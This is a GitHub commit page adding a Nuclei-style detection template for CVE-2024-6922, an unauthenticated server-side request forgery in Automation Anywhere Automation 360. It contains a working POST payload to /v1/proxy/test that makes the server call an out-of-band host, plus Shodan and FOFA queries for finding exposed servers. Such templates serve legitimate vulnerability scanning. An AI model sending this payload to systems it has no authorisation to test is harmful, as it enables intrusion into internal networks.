-
Notifications
You must be signed in to change notification settings - Fork 2.7k
Commit
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Merge pull request #10400 from projectdiscovery/CVE-2024-6922
Create CVE-2024-6922.yaml
- Loading branch information
Showing
1 changed file
with
50 additions
and
0 deletions.
There are no files selected for viewing
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,50 @@ | ||
id: CVE-2024-6922 | ||
|
||
info: | ||
name: Automation Anywhere Automation 360 - Server-Side Request Forgery | ||
author: DhiyaneshDK | ||
severity: high | ||
description: | | ||
Automation Anywhere Automation 360 v21-v32 is vulnerable to Server-Side Request Forgery in a web API component. | ||
impact: | | ||
An attacker with unauthenticated access to the Automation 360 Control Room HTTPS service (port 443) or HTTP service (port 80) can trigger arbitrary web requests from the server. | ||
reference: | ||
- https://www.automationanywhere.com/products/automation-360 | ||
- https://www.rapid7.com/blog/post/2024/07/26/cve-2024-6922-automation-anywhere-automation-360-server-side-request-forgery/ | ||
- https://nvd.nist.gov/vuln/detail/CVE-2024-6922 | ||
metadata: | ||
verified: true | ||
max-request: 1 | ||
shodan-query: http.favicon.hash:-1005691603 | ||
fofa-query: icon_hash="-1005691603" | ||
tags: cve,cve2024,ssrf,oast,automation,anywhere | ||
|
||
http: | ||
- raw: | ||
- | | ||
POST /v1/proxy/test HTTP/1.1 | ||
Host: {{Hostname}} | ||
Content-Type: application/json | ||
{"saasUrl":"{{interactsh-url}}/?param=one#"} | ||
matchers-condition: and | ||
matchers: | ||
- type: word | ||
part: interactsh_protocol | ||
words: | ||
- "dns" | ||
|
||
- type: word | ||
part: body | ||
words: | ||
- '{"message":' | ||
|
||
- type: word | ||
part: content_type | ||
words: | ||
- "application/json" | ||
|
||
- type: status | ||
status: | ||
- 400 |